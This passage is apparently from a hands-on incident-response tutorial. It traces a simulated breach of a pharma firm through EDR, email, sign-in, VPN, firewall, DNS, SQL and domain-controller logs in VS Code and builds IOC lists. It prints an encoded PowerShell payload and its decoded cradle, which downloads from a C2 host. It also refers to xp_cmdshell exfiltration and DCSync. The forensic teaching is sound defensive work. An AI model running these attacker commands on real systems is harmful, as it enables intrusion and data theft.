):</p><pre>jq '.resources[0] | {<br>  detection_id,<br>  severity:  .max_severity_displayname,<br>  host:      .device.hostname,<br>  prevented: .prevention_policy.prevent,<br>  timestamp: .created_timestamp<br>}' crowdstrike/WS-CFO-01-alert-20241115.json</pre><p>Output:</p><pre>{<br>  "detection_id": "ldt:8f2a4b91e33a471cae44b2fdb8812201:884921003",<br>  "severity":     "Critical",<br>  "host":         "WS-CFO-01",<br>  "prevented":    false,<br>  "timestamp":    "2024-11-15T16:42:47.882Z"<br>}</pre><pre># List all detected behaviors<br>jq '.resources[0].behaviors[] | {<br>  timestamp, tactic, technique_id, display_name,<br>  parent: .parent_image_filename,<br>  image:  .filename,<br>  cmdline: (.cmdline // "" | .[0:80])<br>}' crowdstrike/WS-CFO-01-alert-20241115.json</pre><pre># Network connections observed<br>jq '.resources[0].network_accesses[] | {<br>  remote_address, remote_port, direction, timestamp<br>}' crowdstrike/WS-CFO-01-alert-20241115.json</pre><pre># Prevention policy — confirm detect-only mode and note the policy gap<br>jq '.resources[0].prevention_policy | {name, prevent, detect, note}' \<br>  crowdstrike/WS-CFO-01-alert-20241115.json</pre><p><strong>Found IOCs</strong></p><ul><li><strong>Host</strong> WS-CFO-01 — Victim workstation; CrowdStrike detect-only, C2 active</li><li><strong>Hash (SHA256)</strong> de96a6e69944335375dc1ac238336066889d9ffc7d73628ef4fe1b1848474f57 — powershell.exe behavior hash from alert</li><li><strong>Hash (MD5)</strong> 7353f60b1739074eb17c5f4dddefe239 — Same behavior; use both for VT lookup</li><li><strong>Process</strong> OUTLOOK.EXE → powershell.exe — Parent–child execution chain in behaviors[0]</li><li><strong>Cmdline</strong> -NonI -W Hidden -Enc JABjAD0A… — Encoded PowerShell payload; decode in Step 2</li><li><strong>IP</strong> 203.0.113.87 — C2 server; 3 connections in network_accesses, port 443</li></ul><h4>2. Decode the PowerShell Payload</h4><p>In the formatted JSON still open in VS Code, press Ctrl+F and search -Enc — the base64 argument is on the same line. Copy it.</p><p><strong>Decode in the integrated terminal</strong> — do not paste encoded malware into online decoders:</p><pre># PowerShell -Enc uses UTF-16LE encoding<br>echo "JABjAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAA7ACQAYwAuAEgAZQBhAGQAZQByAHMALgBBAGQAZAAoACcAVQBzAGUAcgAtAEEAZwBlAG4AdAAnACwAJwBNAG8AegBpAGwAbABhAC8ANQAuADAAJwApADsAJABkAD0AJABjAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AMgAwADMALgAwAC4AMQAxADMALgA4ADcALwB1AHAAZABhAHQAZQAnACkA" \<br>  | base64 -d</pre><p>Output:</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*gtvadCAbVwcFaB8UcvEPCQ.png"></figure><pre>$c=New-Object System.Net.WebClient;$c.Headers.Add('User-Agent','Mozilla/5.0');$d=$c.DownloadString('https://203.0.113.87/update')</pre><p><strong>In VS Code Explorer:</strong> click sysmon/WS-CFO-01-sysmon.jsonl. Press Ctrl+F, search "EventID": 11 — jumps to the file creation event showing svchost32.exe dropped to AppData\Roaming. The analyst_note field confirms the fake PE timestamp.</p><pre># Cross-check: confirm what the PowerShell dropped<br>jq 'select(.EventID == 11) | {<br>  time: .TimeCreated, dropped_by: .Image, file: .TargetFilename, note: .analyst_note<br>}' sysmon/WS-CFO-01-sysmon.jsonl</pre><p><strong>Or use Base64 extention:</strong></p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*NX8NZYV10DhI03Lgy9E07A.png"></figure><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*hRToibL_ojf36voYhSco2A.png"></figure><p><strong>Found IOCs</strong></p><ul><li><strong>IP</strong> 203.0.113.87 — Primary C2 server; payload download source</li><li><strong>URL</strong> https://203.0.113.87/update — C2 payload URL decoded from base64 PowerShell</li><li><strong>File</strong> svchost32.exe — Dropper deposited to %AppData%\Roaming\; forged PE timestamp</li></ul><h4>3. M365 Message Trace — Rainbow CSV</h4><p><strong>In VS Code Explorer:</strong> click m365/message-trace-p.levi.csv</p><p>With Rainbow CSV installed, every column gets its own color. The status bar at the bottom shows the column name as you move the cursor.</p><p><strong>RBQL — SQL queries against the CSV, no Python needed:</strong></p><p>Press F5 (or click RBQL in the status bar) to open the query console:</p><pre>-- Find all emails where authentication failed<br>SELECT a.* WHERE a16 == "fail" ORDER By a1</pre><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*IF23O_x92zR5XPNGe7gP2A.png"></figure><p>Result pane (right side):</p><pre>2024-10-22T11:23:07Z | security-noreply@mfa-lifetechpharma.com<br>  | ACTION REQUIRED: MFA Re-enrollment — LifeTech IT Security<br>  | Delivered | 4 | fail | fail | fail</pre><p>Three auth failures in one row. SCL=4 delivered because the threshold is 5. Add mfa-lifetechpharma.com to IOC list.</p><pre>SELECT a.* WHERE a17 == '1' &amp;&amp; a16 == 'fail'</pre><p><strong>Save RBQL results:</strong> click <strong>Save to CSV</strong> in the result panel → save as 03-analysis/m365-suspects.csv.</p><p><strong>Switch to </strong><strong>m365/message-trace-m.cohen.csv</strong> (click in Explorer):</p><pre>-- CFO mailbox — find the malicious delivery<br>SELECT a.received_time, a.sender_address, a.subject, a.SCL, a.DMARC, a.has_attachment<br>FROM a<br>WHERE a.DMARC == 'fail' OR a.has_attachment == '1'<br>ORDER BY a.received_time</pre><p>Key finding — CFO phishing email:</p><pre>2024-11-15T15:58:08Z | contracts@globalcontracts-secure.net<br>  | Q4-2024 Licensing Agreement Review — Action Required (URGENT)<br>  | SCL=4 | DMARC=fail | has_attachment=1</pre><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*p6mJFnpdRJE2EvoF-IxUFw.png"></figure><p>The .xlsm attachment was not sandboxed — ATP policy gap (INT-007). Add globalcontracts-secure.net to IOC list.</p><p><strong>Found IOCs</strong></p><ul><li><strong>Domain</strong> mfa-lifetechpharma.com — AiTM phishing sender domain; DMARC/DKIM/SPF all fail</li><li><strong>Email</strong> security-noreply@mfa-lifetechpharma.com — IT admin phishing sender (Oct 22)</li><li><strong>Domain</strong> globalcontracts-secure.net — CFO phishing delivery domain</li><li><strong>Email</strong> contracts@globalcontracts-secure.net — CFO phishing sender (Nov 15)</li><li><strong>Attachment</strong> .xlsm — Macro-enabled Excel; bypassed ATP sandbox (INT-007)</li></ul><h4>4. Azure AD Sign-In Analysis</h4><p><strong>In VS Code Explorer:</strong> click azure-ad/signin-p.levi.json</p><p>Press Shift+Alt+F to format. Open the Outline (Ctrl+Shift+O) — the array shows four sign-in entries. Click entry [1] to jump to aad-signin-002.</p><p><strong>Search</strong> Ctrl+F: type Istanbul — jumps directly to the suspicious sign-in. Read surrounding context without running any command:</p><pre>"city": "Istanbul",<br>"countryOrRegion": "TR",<br>"conditionalAccessStatus": "notApplied",<br>"succeeded": null</pre><p>Three red flags visible immediately in the file: foreign city, CA bypassed, no MFA.</p><p><strong>Full structured extraction in the terminal:</strong></p><pre>jq '.[] | {<br>  id,<br>  time: .properties.createdDateTime,<br>  ip:   .properties.ipAddress,<br>  loc:  "\(.properties.location.city), \(.properties.location.countryOrRegion)",<br>  mfa:  .properties.authenticationDetails[0].succeeded,<br>  ca:   .properties.conditionalAccessStatus,<br>  os:   .properties.deviceDetail.operatingSystem<br>}' azure-ad/signin-p.levi.json</pre><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*XkLVEejy4bkZ71px3sihoQ.png"></figure><p><strong>Red flags on </strong><strong>aad-signin-002:</strong></p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*Isdphk9PrvplMM2sWbc8Vg.png"></figure><p><strong>Found IOCs</strong></p><ul><li><strong>IP</strong> 185.220.101.47 — Attacker source IP; Istanbul, Turkey (Tor exit node)</li><li><strong>Account</strong> p.levi — Compromised IT admin; token replay, no MFA challenge</li><li><strong>Indicator</strong> Token replay — CA policy bypassed; conditionalAccessStatus: notApplied</li></ul><h4>5. VPN Log Analysis</h4><p><strong>In VS Code Explorer:</strong> click vpn/anyconnect-2024-10-24.log</p><p>VS Code opens the plain syslog file. Use Ctrl+F to navigate without any commands:</p><ul><li>Search p.levi — highlights every line for this user</li><li>Search Authentication: successful — the auth event</li><li>Search Assigned address — the internal IP assigned to the session</li><li>Search Duration — total session length</li></ul><pre># Full session chain in the terminal:<br>grep "p.levi" vpn/anyconnect-2024-10-24.log \<br>  | grep -E "(716001|716002|734001|Authentication|Teardown|Assigned)"</pre><p>Output:</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*BsNecLZvZT8bDwFYWsb-nQ.png"></figure><pre>Oct 24 00:17:14 ... User &lt;p.levi&gt; IP &lt;185.220.101.47&gt; Authentication: successful<br>Oct 24 00:17:33 ... User &lt;p.levi&gt; ... Assigned address: 10.10.3.22<br>Oct 24 02:29:08 ... User &lt;p.levi&gt; ... Duration: 1h12m34s</pre><p>185.220.101.47 (Istanbul VPN exit) authenticated as p.levi and was assigned 10.10.3.22 — WS-IT-LEVI's own internal IP. All activity during this session looks like it came from the legitimate workstation.</p><pre>grep -i "mfa\|no.*challenge\|bypass" vpn/anyconnect-2024-10-24.log<br># → NOTE: No MFA challenge issued — session token authentication bypass<br>grep "203.0.113.87" vpn/anyconnect-2024-10-24.log | awk '{print $1,$2,$3}' | head -8<br># → ~7-minute C2 beacons during the VPN session window</pre><p><strong>Found IOCs</strong></p><ul><li><strong>IP</strong> 185.220.101.47 — Attacker VPN source; Istanbul; authenticated as p.levi</li><li><strong>Account</strong> p.levi — Session token auth; no MFA challenge issued</li><li><strong>IP (internal)</strong> 10.10.3.22 — Assigned to attacker session; masks as WS-IT-LEVI</li><li><strong>IP</strong> 203.0.113.87 — C2 beacons during VPN session (~7-min interval)</li></ul><h4>6. NGFW Log Analysis — Rainbow CSV</h4><p><strong>In VS Code Explorer:</strong> click palo-alto/ngfw-flows.csv</p><p>Rainbow CSV colorizes columns. The status bar shows column names as you move the cursor.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*Yz7EggRReYdjyRyz79n79A.png"></figure><p>RBQLHeader<br>a1receive_time<br>a22dport<br>a5src<br>a28bytes<br>a6dst<br>a29bytes_sent<br>a9rule<br>a30bytes_received<br>a10srcuser<br>a33elapsed<br>a12app<br>a34category<br>a27action<br>a41session_end_reason</p><p><strong>In VS Code Explorer:</strong> click palo-alto/ngfw-flows.csv. Press F5 to open the RBQL console.</p><p><strong>Query 1 — find anomalies: all flows sorted by bytes_sent descending</strong></p><p>Start here every time. The outlier appears immediately.</p><pre>SELECT a1, a5, a6, a22,<br>       Math.round(parseInt(a29) / 1048576) + ' MB' AS sent_MB,<br>       Math.round(parseInt(a30) / 1024) + ' KB' AS rcvd_KB,<br>       a33 + 's', a10<br>ORDER BY parseInt(a29) DESC</pre><p>Result:</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*pszv_-CeRnD-lNlUmL8VBQ.png"></figure><pre>2024-11-06T00:14:14Z | 10.10.2.15 | 198.51.100.44 | 443 | 381 MB | 409 KB | 312s |<br>2024-11-15T16:42:41Z | 10.10.1.45 | 203.0.113.87  | 443 |  17 MB |  10 KB |  63s | LIFETECHPHARMA\m.cohen<br>2024-11-15T16:49:22Z | 10.10.1.45 | 203.0.113.87  | 443 |  14 MB |  10 KB |  61s | LIFETECHPHARMA\m.cohen<br>2024-11-15T16:56:03Z | 10.10.1.45 | 203.0.113.87  | 443 |  14 MB |  10 KB |  59s | LIFETECHPHARMA\m.cohen<br>2024-11-06T00:09:44Z | 10.10.3.22 | 203.0.113.87  | 443 |   9 KB |   7 KB |  51s | LIFETECHPHARMA\p.levi<br>...</pre><p>The first row is 17,000× larger than any other flow. Upload ratio 99% (381 MB sent, 409 KB received). Session lasted 312 seconds. This is data exfiltration, not a download.</p><p>Two hosts are beaconing to the same C2 IP: 10.10.3.22 (IT admin, p.levi) and 10.10.1.45 (CFO, m.cohen) — two separate infections.</p><p><strong>Query 2 — exfil upload ratio: flag flows where sent &gt; 90% of total bytes</strong></p><pre>SELECT a1, a5, a6, a22,<br>       Math.round(parseInt(a29) / 1048576) + ' MB' AS sent_MB,<br>       Math.round(parseInt(a29) * 100 / (parseInt(a28) + 1)) + '%' AS upload_pct,<br>       a33 + 's'<br>WHERE parseInt(a28) &gt; 100000<br>ORDER BY parseInt(a29) DESC</pre><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*UkpGfIAnhSx0k-VE5CATzg.png"></figure><p>Result: only one row — 10.10.2.15 → 198.51.100.44, 99% upload, 381 MB. Every other flow is bidirectional C2 (55–65% upload) which is beacon traffic, not exfil.</p><p><strong>Query 3 — beacon pattern: repeated small flows to same external IP</strong></p><pre>SELECT a6, COUNT(a6) AS sessions,<br>       AVG(parseInt(a28)) AS avg_bytes,<br>       AVG(parseInt(a33)) AS avg_elapsed_s<br>WHERE a6 &amp;&amp; !a6.startsWith('10.') &amp;&amp; !a6.startsWith('192.168.')<br>   &amp;&amp; !isNaN(parseInt(a28))<br>GROUP BY a6Result:</pre><pre>203.0.113.87   | 9 sessions | ~14 KB avg | ~47s avg<br>198.51.100.44  | 1 session  | 399 MB avg | 312s avg</pre><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*264pKTvyyeuGVoAIwQVvSw.png"></figure><p>203.0.113.87 has 9 short uniform sessions — beacon. 198.51.100.44 has one giant session — exfil.</p><p><strong>Query 4 — internal lateral movement: flows that stay inside RFC-1918</strong></p><pre>SELECT a1, a5, a6, a22, a28, a9, a10<br>WHERE a5 &amp;&amp; a6<br>   &amp;&amp; (a5.startsWith('10.') || a5.startsWith('192.168.'))<br>   &amp;&amp; (a6.startsWith('10.') || a6.startsWith('192.168.'))<br>ORDER BY a1</pre><p>Result:</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*epr64_sA5gqNzWxgEi-LpQ.png"></figure><pre>2024-11-15T19:14:08Z | 10.10.1.45 | 10.10.2.20 | 135   | 8441  | InternalAccess-Allow<br>2024-11-15T19:14:18Z | 10.10.1.45 | 10.10.2.20 | 49152 | 12884 | InternalAccess-Allow</pre><p>CFO workstation (10.10.1.45) connected to an internal host (10.10.2.20) on port 135 (DCE/RPC endpoint mapper) then port 49152 (dynamic RPC). This is the WMI/DCOM lateral movement signature — 3 hours after the CFO was compromised.</p><p><strong>Query 5 — beacon timing: isolate C2 host and sort by time to measure intervals</strong></p><pre>SELECT a1, a5, a6, parseInt(a29) AS bytes_sent, a33 + 's'<br>WHERE a6 == '203.0.113.87'<br>ORDER BY a1</pre><p>Result:</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*f8M-EcFKrYAOXIzIOfoNlw.png"></figure><pre>2024-11-01T07:14:02Z | 10.10.3.22 | 8441 bytes | 47s   ← WS-IT-LEVI session 1<br>2024-11-01T07:21:14Z | 10.10.3.22 | 8221 bytes | 45s   ← gap: 432s<br>2024-11-01T07:28:44Z | 10.10.3.22 | 7882 bytes | 44s   ← gap: 450s<br>                     ↓ 4.7-day silence (C2 dormant) ↓<br>2024-11-06T00:09:44Z | 10.10.3.22 | 9441 bytes | 51s   ← WS-IT-LEVI session 2<br>2024-11-06T00:17:01Z | 10.10.3.22 | 8001 bytes | 46s   ← gap: 437s<br>2024-11-06T00:24:33Z | 10.10.3.22 | 8011 bytes | 44s   ← gap: 452s<br>2024-11-15T16:42:41Z | 10.10.1.45 | 18221 bytes| 63s   ← WS-CFO-01 session 1<br>2024-11-15T16:49:22Z | 10.10.1.45 | 14441 bytes| 61s   ← gap: 401s<br>2024-11-15T16:56:03Z | 10.10.1.45 | 15001 bytes| 59s   ← gap: 421s</pre><p>Beacon interval: <strong>432–452 seconds (~7.2 minutes)</strong>. Consistent across both infected hosts — same implant, same configuration. The 4.7-day gap (Nov 1–6) between IT admin beacon clusters is the C2 going quiet while staging lateral movement.</p><p><strong>Click </strong><strong>palo-alto/dns-queries.csv</strong> in Explorer.</p><p><strong>Column map:</strong></p><p>RBQLHeader<br>a1receive_time<br>a2src<br>a4query<br>a6response<br>a8category<br>a10analyst_note</p><p><strong>Query 6 — all malware-category queries, sorted by time</strong></p><pre>SELECT a1, a2, a4, a6, a8<br>FROM a<br>WHERE a8 == 'malware'<br>ORDER BY a1</pre><p>Result — full malware DNS timeline:</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*RErM3MswME78yNNi0pB92A.png"></figure><pre>2024-10-22T09:28:41Z | 10.10.3.22 | mfa-lifetechpharma.com       | 185.220.101.47  | malware ← AiTM phishing page loaded<br>2024-10-22T09:29:02Z | 10.10.3.22 | mfa-lifetechpharma.com       | 185.220.101.47  | malware ← token stolen<br>2024-11-01T07:14:00Z | 10.10.3.22 | telemetry-cdn-services.biz   | 203.0.113.87    | malware ← C2 beacon 1<br>2024-11-01T07:21:14Z | 10.10.3.22 | telemetry-cdn-services.biz   | 203.0.113.87    | malware<br>2024-11-01T07:28:44Z | 10.10.3.22 | telemetry-cdn-services.biz   | 203.0.113.87    | malware<br>2024-11-06T00:09:01Z | 10.10.3.22 | telemetry-cdn-services.biz   | 203.0.113.87    | malware<br>2024-11-06T00:17:01Z | 10.10.3.22 | telemetry-cdn-services.biz   | 203.0.113.87    | malware ← (missing from log)<br>2024-11-06T00:24:33Z | 10.10.3.22 | telemetry-cdn-services.biz   | 203.0.113.87    | malware<br>2024-11-06T00:10:14Z | 10.10.2.15 | sys-update-cdn.net            | 198.51.100.44   | malware ← exfil domain lookup<br>2024-11-15T15:58:08Z | 10.10.1.45 | globalcontracts-secure.net    | 185.220.101.52  | malware ← CFO phishing domain<br>2024-11-15T16:42:33Z | 10.10.1.45 | telemetry-cdn-services.biz   | 203.0.113.87    | malware ← CFO C2 beacon 1<br>2024-11-15T16:49:22Z | 10.10.1.45 | telemetry-cdn-services.biz   | 203.0.113.87    | malware<br>2024-11-15T16:56:03Z | 10.10.1.45 | telemetry-cdn-services.biz   | 203.0.113.87    | malware</pre><p><strong>Query 7 — per-host beacon count: how many hosts are infected?</strong></p><pre>SELECT a2, COUNT(a2) AS queries<br>WHERE a4 == 'telemetry-cdn-services.biz'<br>GROUP BY a2</pre><p>Result:</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*v94DK5JOd0MBwJUOjqBpAg.png"></figure><pre>10.10.3.22 | 6   ← WS-IT-LEVI (IT admin) — infected Nov 1<br>10.10.1.45 | 3   ← WS-CFO-01 (CFO) — infected Nov 15</pre><p>Two hosts. Two infections. Same C2 domain. The IT admin host was the initial foothold; the CFO host is the second wave, 14 days later.</p><p><strong>Query 8 — new IP: attacker recon before VPN login</strong></p><pre>SELECT a1, a2, a4, a6, a8, a10<br>WHERE a2 &amp;&amp; !a2.startsWith('10.') &amp;&amp; !a2.startsWith('192.168.')<br>ORDER BY a1</pre><p>Result:</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*lj9D7dZos_et_O16rjcfOg.png"></figure><pre>2024-10-24T00:16:44Z | 185.220.101.47 | vpn.lifetechpharma.com | 10.10.8.1 | business-and-economy</pre><p>The attacker IP (185.220.101.47) looked up the VPN hostname 1 minute before the successful VPN login. Confirms active operator, not automated tool.</p><p><strong>Cross-reference with flows</strong> (Ctrl+Shift+F → 198.51.100.44):</p><pre>ngfw-flows.csv   line 11: 10.10.2.15 → 198.51.100.44 | 399 MB | 312s<br>dns-queries.csv  line 14: 10.10.2.15 → sys-update-cdn.net → 198.51.100.44</pre><p>DNS lookup at 00:10:14Z, flow starts at 00:14:14Z — 4-minute gap between resolution and transfer start. Consistent with manual operator staging the upload command.</p><p><strong>Found IOCs</strong></p><ul><li><strong>IP</strong> 198.51.100.44 — Exfil destination; 381 MB upload, 99% upload ratio, 312s, single session</li><li><strong>IP (internal)</strong> 10.10.2.15 — SERVER-RD-02; exfil source host</li><li><strong>IP</strong> 203.0.113.87 — C2 server; 9 beacon sessions from 2 hosts, ~7.2-min interval</li><li><strong>IP</strong> 185.220.101.52 — New; CFO phishing page host (globalcontracts-secure.net)</li><li><strong>IP (internal)</strong> 10.10.2.20 — Lateral movement target; reached from CFO host on ports 135 + 49152 (RPC/WMI)</li><li><strong>Domain</strong> telemetry-cdn-services.biz — C2 domain; queried by both 10.10.3.22 and 10.10.1.45</li><li><strong>Domain</strong> sys-update-cdn.net — Exfil domain; resolves to 198.51.100.44; queried by 10.10.2.15</li><li><strong>Domain</strong> mfa-lifetechpharma.com — AiTM phishing domain; resolves to 185.220.101.47</li><li><strong>Indicator</strong> Beacon interval 432–452s (~7.2 min) — identical across both infected hosts; same implant config</li><li><strong>Indicator</strong> Attacker recon: 185.220.101.47 queried vpn.lifetechpharma.com 1 min before VPN login7. SQL Audit Log Analysis</li></ul><h4><strong>7. SQL Audit Log Analysis</strong></h4><p><strong>In VS Code Explorer:</strong> click sql-audit/SERVER-RD-02-sql-audit.jsonl</p><p>Each line is a JSON object. Use Ctrl+F to navigate directly to key events:</p><p>Search termJumps to</p><p>xp_cmdshellShell execution events<br>AuditLogAdversary OPSEC recon <br>(SELECT) and anti-forensics (DELETE)<br>UploadFileThe exfiltration command<br>Compress-ArchiveThe staging command</p><p><strong>Full chain in the terminal:</strong></p><pre>jq -r '[.EventTime, .LoginName, .StatementType, (.Statement[0:90])] | @tsv' \<br>  sql-audit/SERVER-RD-02-sql-audit.jsonl</pre><p>Six events: enumerate → recon (SELECT AuditLog) → stage → exfil → cleanup → anti-forensics (DELETE AuditLog). The DELETE at 00:15:22Z failed because Splunk had already ingested these rows before it ran.</p><p><strong>Found IOCs</strong></p><ul><li><strong>Account</strong> svc_backup — Lateral movement account; executed full xp_cmdshell chain</li><li><strong>URL</strong> 198.51.100.44/recv — Exfil endpoint used by WebClient.UploadFile</li><li><strong>File</strong> USPartner2024-formulas.zip — Staged archive; formula data compressed before exfil</li><li><strong>Indicator</strong> xp_cmdshell (T1059.003) — SQL Server shell used as execution proxy</li><li><strong>Indicator</strong> Anti-forensics — DELETE on SQL AuditLog at 00:15:22Z; blocked by prior Splunk ingestion</li></ul><h4>8. Windows Security Event Log Analysis</h4><p><strong>In VS Code Explorer:</strong> click windows-security/DC01-security.jsonl</p><p>Press Ctrl+F, search 4662 — jumps to the DCSync event. The analyst_note gives the human-readable summary in the file itself:</p><pre>🔴 CRITICAL: DCSync — DS-Replication-Get-Changes + DS-Replication-Get-Changes-All<br>from WORKSTATION IP 10.10.3.22 (WS-IT-LEVI). NOT a DC. NOT in pentest VLAN (10.10.99.x).</pre><pre># All three DCSync events — domain, krbtgt, Administrator<br>jq 'select(.EventID == 4662) | {<br>  time: .TimeCreated, subject: .SubjectUserName, object: .ObjectName<br>}' windows-security/DC01-security.jsonl</pre><p>Output:</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/881/1*xlE6AoS-kD4FYW5DmwGVxw.png"></figure><pre>{"time": "2024-11-06T00:48:33Z", "subject": "svc_backup", "object": "DC=lifetechpharma,DC=local"}<br>{"time": "2024-11-06T00:48:44Z", "subject": "svc_backup", "object": "CN=krbtgt,CN=Users,DC=..."}<br>{"time": "2024-11-06T00:48:51Z", "subject": "svc_backup", "object": "CN=Administrator,CN=..."}</pre><p>krbtgt and Administrator DCSync'd — golden ticket capability obtained. Full domain credential rotation required.</p><p><strong>Click </strong><strong>windows-security/SERVER-RD-02-security.jsonl:</strong></p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*r5ZHpES2uPK3SDDVU4yoMg.png"></figure><p>Ctrl+F → 4663 — file access events. Ctrl+F → 5156 — network connection event.</p><pre>jq 'select(.EventID == 4663) | .ObjectName' \<br>  windows-security/SERVER-RD-02-security.jsonl | jq -s 'length'<br># → 47  (47 formula files accessed)<br>jq 'select(.EventID == 5156) | {<br>  time: .TimeCreated, process: (.Application | split("\\\\") | last),<br>  src: .SourceAddress, dst: .DestAddress, dst_port: .DestPort<br>}' windows-security/SERVER-RD-02-security.jsonl<br># → PowerShell → 198.51.100.44:443 at 00:14:14Z</pre><p>Three independent sources — SQL audit (00:13:54Z command issued), NGFW flow (00:14:14Z bytes transferred), Windows Security EID 5156 (00:14:14Z connection initiated) — triangulate to the same 20-second window.</p><p><strong>Found IOCs</strong></p><ul><li><strong>Account</strong> svc_backup — DCSync actor; source IP 10.10.3.22 (non-DC workstation)</li><li><strong>IP (internal)</strong> 10.10.3.22 — WS-IT-LEVI; attacker pivot host issuing DCSync from workstation</li><li><strong>Object</strong> krbtgt — DCSync'd at 00:48:44Z; golden ticket capability obtained</li><li><strong>Object</strong> Administrator — DCSync'd at 00:48:51Z; full domain compromise</li><li><strong>IP</strong> 198.51.100.44:443 — Exfil connection via PowerShell; EID 5156 at 00:14:14Z</li><li><strong>Count</strong> 47 formula files — Accessed via EID 4663 in USPartner2024 share</li></ul><h4>9. Cross-File Pivot — VS Code Global Search</h4><p>VS Code’s Ctrl+Shift+F searches across every open file simultaneously. Use it to verify IOC presence across all evidence in seconds — no SIEM needed for these basic pivots.</p><p><strong>Pivot on the exfil IP:</strong></p><p>Ctrl+Shift+F → 198.51.100.44:</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*qD5I2ewZTvBRksb7P9Zt5A.png"></figure><pre>ngfw-flows.csv           line 12: ...10.10.2.15,198.51.100.44,443,...399481224...<br>dns-queries.csv          line 10: ...sys-update-cdn.net,A,198.51.100.44...<br>sql-audit.jsonl          line 4:  ...WebClient.UploadFile...198.51.100.44/recv...<br>SERVER-RD-02-security    line 23: ..."DestAddress":"198.51.100.44"...</pre><p>Four files, four hits, one IP. The full exfiltration chain is visible in one search.</p><p><strong>Pivot on the compromised account:</strong></p><p>Ctrl+Shift+F → svc_backup:</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*E8CUk7R4lSjYg01UIH0chg.png"></figure><pre>DC01-security.jsonl       lines 7-9:   DCSync events<br>SERVER-RD-02-security     lines 1-12:  SMB logon + file access + exfil<br>sql-audit.jsonl           all 6 lines: full xp_cmdshell chain</pre><p><strong>Pivot on the C2 domain:</strong></p><p>Ctrl+Shift+F → telemetry-cdn-services.biz:</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*WeNgTuMzhjm9Pl_lXXGmvQ.png"></figure><pre>dns-queries.csv           lines 12-23: 11 beacon queries (6 from WS-IT-LEVI, 4 from WS-CFO-01, 1 missing)</pre><p><strong>Pivot on the attacker source IP (AiTM phishing + VPN access):</strong></p><p>Ctrl+Shift+F → 185.220.101.47:</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*MHyXMsFanJsG_dvdWSnKqw.png"></figure><pre>azure-ad/signin-p.levi.json          line 18: suspicious sign-in from Istanbul — token replay, no MFA<br>vpn/anyconnect-2024-10-24.log        line 4:  VPN authentication as p.levi, assigned 10.10.3.22<br>palo-alto/dns-queries.csv            line 1:  attacker queried vpn.lifetechpharma.com 1 min before login</pre><p>One IP ties together AiTM credential theft, VPN infiltration, and the recon that preceded it.</p><p>The full attack chain — AiTM phishing → VPN access → formula exfiltration → DCSync → CFO infection — is navigable via these four global searches without opening a SIEM:</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*n_vokO1vkbqN5O709MFF-w.png"></figure><p>Search termAttack phase covered185.220.101.47Initial access: AiTM phishing, VPN infiltration, attacker recontelemetry-cdn-services.bizPersistence: C2 beaconing from both infected hostssvc_backupLateral movement: SMB, xp_cmdshell chain, DCSync198.51.100.44Exfiltration: NGFW flow, DNS lookup, SQL upload command, EID 5156</p><p><strong>Found IOCs</strong></p><ul><li><strong>IP</strong> 198.51.100.44 — Confirmed in 4 files: ngfw-flows, dns-queries, sql-audit, SERVER-RD-02-security</li><li><strong>Account</strong> svc_backup — Confirmed in 3 files: DC01-security (DCSync), SERVER-RD-02-security (SMB+exfil), sql-audit (xp_cmdshell)</li><li><strong>Domain</strong> telemetry-cdn-services.biz — Confirmed in dns-queries (9 beacons) and VPN log (C2 during session)</li><li><strong>Timestamp</strong> 00:13:54Z – 00:14:14Z — 20-second exfil window triangulated across SQL, NGFW, and EID 5156</li></ul><h4>10. IOC Enrichment — REST Client</h4><p>Create one .http file that holds every API call. VS Code's REST Client extension puts a <strong>Send Request</strong> link above each block — click it, the response appears in a split pane on the right. No curl, no terminal, no context switch.</p><p><strong>Create the file:</strong></p><p>Press Ctrl+N, then Ctrl+Shift+P → <strong>Save As</strong> → 03-analysis/ioc-queries.http</p><p>Paste the following:</p><pre>### IOC Enrichment — PROJ-2024-001<br>### Click "Send Request" above any block — response opens in the right pane<br>### Set keys in VS Code Settings &gt; REST Client &gt; Environment Variables<br>### or use system env: @VT_KEY = {{$env VT_API_KEY}}<br><br>@VT_KEY     = your_virustotal_api_key_here<br>@SHODAN_KEY = your_shodan_api_key_here<br><br># ── VirusTotal ──────────────────────────────────────────────────────<br><br>### VT — Primary C2 IP<br>GET https://www.virustotal.com/api/v3/ip_addresses/203.0.113.87<br>x-apikey: {{VT_KEY}}<br><br>###<br><br>### VT — Secondary C2 / exfil IP<br>GET https://www.virustotal.com/api/v3/ip_addresses/198.51.100.44<br>x-apikey: {{VT_KEY}}<br><br>###<br><br>### VT — Attacker VPN source<br>GET https://www.virustotal.com/api/v3/ip_addresses/185.220.101.47<br>x-apikey: {{VT_KEY}}<br><br>###<br><br>### VT — Primary C2 domain<br>GET https://www.virustotal.com/api/v3/domains/telemetry-cdn-services.biz<br>x-apikey: {{VT_KEY}}<br><br>###<br><br>### VT — AiTM phishing page domain<br>GET https://www.virustotal.com/api/v3/domains/mfa-lifetechpharma.com<br>x-apikey: 